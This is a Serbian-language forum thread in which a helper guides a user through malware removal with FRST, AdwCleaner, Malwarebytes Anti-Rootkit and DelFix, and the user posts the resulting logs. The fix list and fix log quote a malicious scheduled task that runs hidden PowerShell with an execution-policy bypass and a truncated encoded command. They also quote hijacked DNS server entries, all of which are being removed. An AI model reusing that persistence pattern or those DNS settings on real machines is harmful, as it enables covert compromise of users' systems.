Tcpip\..\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{627F5846-FF3A-472B-97D7-ED63E537C666}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{A130A098-8119-459A-B674-237CE86CB682}: [DhcpNameServer] 82.163.142.3
Google Update Helper (x32 Version: 1.3.23.0 - BonanzaDeals) Hidden <==== Pažnja!
Task: {329D1CA3-A304-4FBC-B0BE-D5A539A6BD1E} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\iWin Games\iWinGames.exe
C:\Program Files (x86)\iWin Games
Task: {7BA99F3F-3AD7-4FC0-A115-AF54B5160A69} - System32\Tasks\{108D5BC9-C2D8-E675-A0C5-3D2734D3BA12} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwAgADsAIAA7ACAAIAAgADsAOwA7ACAAOwAgADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (unos podatka ima 8180 više karaktera).
AlternateDataStreams: C:\ProgramData\Temp:059167AF [96]
AlternateDataStreams: C:\ProgramData\Temp:44E16D4A [130]
AlternateDataStreams: C:\ProgramData\Temp:69FE2EE4 [130]
AlternateDataStreams: C:\ProgramData\Temp:7AF0BE36 [290]
AlternateDataStreams: C:\ProgramData\Temp:800FE171 [135]
AlternateDataStreams: C:\Users\mm\AppData\Local:3tM8462TIRzq5MSeqy2LDH3K [2212]
AlternateDataStreams: C:\Users\mm\AppData\Local\Temp:0pJux9gssYDdw1uoaBa3fmAWEK1A [2128]
Hosts:
EmptyTemp:

2. Sačuvaj notepad na Desktop pod nazivom fixlist.txt
To možes uraditi i iz notepad-a => klik na File potom na Save As i u novom prozoru, dole pod File Name: staviš za naziv fixlist.txt
Napomena: Važno je da se oba fajla, FRST i fixlist nalaze na istoj lokaciji jer u suprotnom fix nece raditi.

3. Ponovo pokreni FRST/FRST64, klikni jednom na dugme Fix i sačekaj.
Ukoliko alat zatraži restart sistema, dozvoli mu i postaraj se da alat kompletira fix nakon restarta sistema.



Alat će formirati log (Fixlog.txt) na Desktop-u. Potrebno je sadržaj tog loga iskopirati u poruku.
Napomena: Ukoliko te alat upozori da postoji novija verzija, postaraj se da preuzmes i koristiš ažuriranu kopiju FRST-a.



Nakon toga,

Preuzmi AdwCleaner i sačuvaj ga na Desktop
Dvoklikom pokreni program.
U EULA prozoru klikni na I agree.
U Options isključi Reset Winsock settings ako je uključen.
Klikni na dugme Scan i sačekaj da se završi skeniranje.
Klikni na dugme Cleaning i pričekaj da program završi.
Program će zatvoriti sve aktivne programe i izbaciti prozor sa tim upozorenjem. Klikni OK kao potvrdu.
Na sljedeća dva prozora koja se otvore (Informations i Restart required ) klikni OK
Računar će se restartovati, a potom otvoriti Notepad (C:\Adwcleaner\AdwCleaner[C1].txt) sa izvještajem.
Sačuvaj taj izvještaj na Desktop i okači ga uz poruku koristeći opciju "Prikači fajl"

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Uloguj se preko Facebooka da bi skinuo fajl:

Napisano: 09 Dec 2016 0:10

Izveštaj ispravaka od Farbar Recovery Scan Tool (x64) Verzija: 07-12-2016
Pokrenuo mm (08-12-2016 23:32:23) Run:1
Pokrenuto sa C:\Users\mm\Desktop\first
Učitani Profili: mm (Dostupani Profili: mm)
Režim pokretanja sistema: Normal
==============================================

fixlist sadržaj:
*****************
CreateRestorePoint:
CloseProcesses:
Tcpip\..\Interfaces\{335094DD-08C8-4D04-83ED-54B2A09E695F}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{627F5846-FF3A-472B-97D7-ED63E537C666}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{A130A098-8119-459A-B674-237CE86CB682}: [DhcpNameServer] 82.163.142.3
Google Update Helper (x32 Version: 1.3.23.0 - BonanzaDeals) Hidden <==== Pažnja!
Task: {329D1CA3-A304-4FBC-B0BE-D5A539A6BD1E} - System32\Tasks\RunAsStdUser Task => C:\Program Files (x86)\iWin Games\iWinGames.exe
C:\Program Files (x86)\iWin Games
Task: {7BA99F3F-3AD7-4FC0-A115-AF54B5160A69} - System32\Tasks\{108D5BC9-C2D8-E675-A0C5-3D2734D3BA12} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwAgADsAIAA7ACAAIAAgADsAOwA7ACAAOwAgADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (unos podatka ima 8180 više karaktera).
AlternateDataStreams: C:\ProgramData\Temp:059167AF [96]
AlternateDataStreams: C:\ProgramData\Temp:44E16D4A [130]
AlternateDataStreams: C:\ProgramData\Temp:69FE2EE4 [130]
AlternateDataStreams: C:\ProgramData\Temp:7AF0BE36 [290]
AlternateDataStreams: C:\ProgramData\Temp:800FE171 [135]
AlternateDataStreams: C:\Users\mm\AppData\Local:3tM8462TIRzq5MSeqy2LDH3K [2212]
AlternateDataStreams: C:\Users\mm\AppData\Local\Temp:0pJux9gssYDdw1uoaBa3fmAWEK1A [2128]
Hosts:
EmptyTemp:
*****************

Tačka vraćanja je uspešno kreirana.
Procesi su zatvoreni uspešno.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{335094DD-08C8-4D04-83ED-54B2A09E695F}\\DhcpNameServer => vrednost uspešno uklonjeno
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}\\NameServer => vrednost uspešno uklonjeno
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{627F5846-FF3A-472B-97D7-ED63E537C666}\\DhcpNameServer => vrednost uspešno uklonjeno
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{A130A098-8119-459A-B674-237CE86CB682}\\DhcpNameServer => vrednost uspešno uklonjeno
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}\\SystemComponent => vrednost uspešno uklonjeno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{329D1CA3-A304-4FBC-B0BE-D5A539A6BD1E}" => ključ uspešno uklonjeno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{329D1CA3-A304-4FBC-B0BE-D5A539A6BD1E}" => ključ uspešno uklonjeno
C:\WINDOWS\System32\Tasks\RunAsStdUser Task => uspešno premešteno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RunAsStdUser Task" => ključ uspešno uklonjeno
"C:\Program Files (x86)\iWin Games" => nije pronađena.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7BA99F3F-3AD7-4FC0-A115-AF54B5160A69}" => ključ uspešno uklonjeno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BA99F3F-3AD7-4FC0-A115-AF54B5160A69}" => ključ uspešno uklonjeno
C:\WINDOWS\System32\Tasks\{108D5BC9-C2D8-E675-A0C5-3D2734D3BA12} => uspešno premešteno
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{108D5BC9-C2D8-E675-A0C5-3D2734D3BA12}" => ključ uspešno uklonjeno
C:\ProgramData\Temp => ":059167AF" ADS uspešno uklonjeno.
C:\ProgramData\Temp => ":44E16D4A" ADS uspešno uklonjeno.
C:\ProgramData\Temp => ":69FE2EE4" ADS uspešno uklonjeno.
C:\ProgramData\Temp => ":7AF0BE36" ADS uspešno uklonjeno.
C:\ProgramData\Temp => ":800FE171" ADS uspešno uklonjeno.
C:\Users\mm\AppData\Local => ":3tM8462TIRzq5MSeqy2LDH3K" ADS uspešno uklonjeno.
C:\Users\mm\AppData\Local\Temp => ":0pJux9gssYDdw1uoaBa3fmAWEK1A" ADS uspešno uklonjeno.
C:\Windows\System32\Drivers\etc\hosts => uspešno premešteno
Hosts uspešno vraćeno u predhodno stanje.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 32728454 B
Java, Flash, Steam htmlcache => 787 B
Windows/system/drivers => 12163779 B
Edge => 0 B
Chrome => 16111922 B
Firefox => 21604822 B
Opera => 992687250 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 199630 B
systemprofile32 => 560 B
LocalService => 416878 B
NetworkService => 8956952 B
mm => 55765854 B

RecycleBin => 0 B
EmptyTemp: => 1.1 GB privremeni podaci Uklonjeni.

================================


Sistemu je potreban ponovno pokretanje.

==== Kraj od Fixlog 23:36:29 ====


mycity.rs/must-login.png

Dopuna: 09 Dec 2016 0:34

Sada je sve OK.
Hvala na vremenu i trudu.

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Odlicno. Hajmo samo jos jednu proveru.

Preuzmi Malwarebytes Anti-Rootkit (MBAR) sa sledeceg linka i sacuvaj ga na Desktop.

Dvoklikom pokreni MBAR () na ikonicu programa:
- Klikni OK na sledecem prozoru da bi dozvolio raspakivanje u zaseban mbar folder na desktop-u;
- mbar.exe ce biti startovan. Na nekim sistemima to moze da potraje nekoliko dodatnih sekundi, te pricekati pokretanje.;
- U uvodnom prozoru klikni dugme Next ukoliko si saglasan;


• Na 'Update Database' prozoru klik na dugme Update da bi preuzeo sveze definicije. Kada se ispise poruka 'Success: Database was successfully updated' klik na dugme Next;
• Pod sekcijom 'Scan Targets' proveri da su sve opcije stiklirane, te klikni na dugme Scan;

Obavestenje: sa nekim infekcijama moze se desiti da se prikaze neka od sledecih poruka:
- 'Could not load protection driver' => u tom slucaju klikni OK.
- 'Could not load DDA driver' => klikni Yes na to obavestenje da bi dozvolio ucitavanje nakon restarta. Dozvoli restart i nastavi sa ostatkom instrukcija posle restarta.




>> Ukoliko malware nije detektovan, klik na Exit dugme da zatvoris program. U sledecu poruku postavi mbar-log-year-month-day (sat-minuti-sekundi).txt i system-log.txt izveštaje.

>> Ukoliko su infekcija/e pronadjene, proveriti da li je obelezena opcija 'Create Restore Point' i klikni na dugme Cleanup! da bi uklonili pretnje.
- Procedura uklanjanje malware-a (scheduled) ce biti zakazana po restartu, bice prikazano obavestenje u pop-up prozoru. Klikni dugme Yes i sistem bi trebao da se restartuje i da zavrsi proceduru ciscenja.



Obavestenje! samo ukoliko je RootKit detektovan: - postaraj se da pokrenes fixdamage.exe alat koji se nalazi u mbar folderu, \Plugins\fixdamage.exe:
- Dvoklikom pokreni fixdamage, u crnom prozoru koji se otvori (command prompt) ukucaj Y (Y stoji za Yes) da bi nastavio izvrsenje, pricekati da alat odradi sve popravke ...
- Kada vidis poruku 'press any key to exit' popravka je kompletirana. Pritisnuti bilo koju tipku na tastaturi da bi se prozor zatvorio. Restartovati sistem.




Sledeci izvestaji ce biti formirani u mbar folderu.
1. mbar-log-year-month-day (hour-minute-second).txt
2. system-log.txt

Iskopiraj sadrzaj mbar log-a u poruku a system log okaci uz poruku koristeci opciju Prikači fajl.

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Uloguj se preko Facebooka da bi skinuo fajl:

Izvini na kašnjenju,ali kao što rekoh sada je sve OK.

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
malwarebytes.org

Database version:
main: v2016.12.10.08
rootkit: v2016.11.20.01

Windows 8.1 x64 NTFS
Internet Explorer 11.0.9600.18161
mm :: PC_WIN9 [administrator]

11.12.2016. 1:43:25
mbar-log-2016-12-11 (01-43-25).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 385575
Time elapsed: 2 hour(s), 13 minute(s), 47 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)



mycity.rs/must-login.png
Thanks again

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Uloguj se preko Facebooka da bi skinuo fajl:

Evo logova
1.
mycity.rs/must-login.png
2.
mycity.rs/must-login.png

• 1Ovo se svidja korisniku: eleutheros
  
  Registruj se da bi pohvalio/la poruku!

U redu. Izvinjavam se na cekanju.

Ovde smo zavrsili i tvoj racunar je trenutno cist sto se mavlera tice

• Sledeća procedura će implementirati završno čišćenje.



Preuzmi "Xplode"-ov DelFix alat i snimi ga na Desktop.

Dvoklikom pokreni alat i štikliraj kućice ispred sledećih opcija;
Remove disinfection tools
Create registry backup
Purge System Restore

Klikni na dugme Run i pričekaj trenutak dok alat ne završi svoj rad.

Od ovog trenutka, svi korišćeni alati u ovoj temi bi trebali biti obrisani.
Ukoliko neki alat ili izveštaj nije uklonjen, slobodno ih obriši ručno.


Alat će takođe formirati izveštaj za tebe. (C:\DelFix.txt)
- Alat će snimiti i zdravo stanje registy-ja i napraviti backup koristeci integrisan program "ERUNT" u %windir%\ERUNT\DelFix
- DelFix briše stare system restore tačke i pravi novu, svežu tačku nakon čišćenja.